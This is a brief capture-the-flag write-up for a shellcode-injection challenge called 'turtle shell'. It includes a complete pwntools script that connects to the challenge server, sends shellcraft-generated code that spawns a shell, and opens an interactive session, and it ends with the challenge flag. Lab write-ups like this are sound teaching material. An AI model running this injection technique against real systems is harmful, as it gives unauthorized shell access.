turtle shell
simple shellcode
Problem
Solution
Its a simple and straight forward shellcode injection, it can be implied from the name and the fact that none of the protection is enabled.

The program simply takes our input and runs it as code, we can use pwntools's shellcraft to spawn a shell

#!user/bin/python3
from pwn import *
# =========================================================
# SETUP
# =========================================================
exe = './turtle-shell'
context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
local = False
if(local):
io = process(exe)
else:
io = remote('turtle.sdc.tf', 1337)
# =========================================================
# ADDRESSES
# =========================================================
# =========================================================
# EXPLOITS
# =========================================================
shellcode = asm(shellcraft.sh())
# flattening payload here
payload = flat([
shellcode,
])
io.sendline(payload)
io.interactive()
Flag
sdctf{w0w_y0u_m4d3_7h3_7urT13_c0m3_0u7_0f_1t5_5h3l1}
Last updated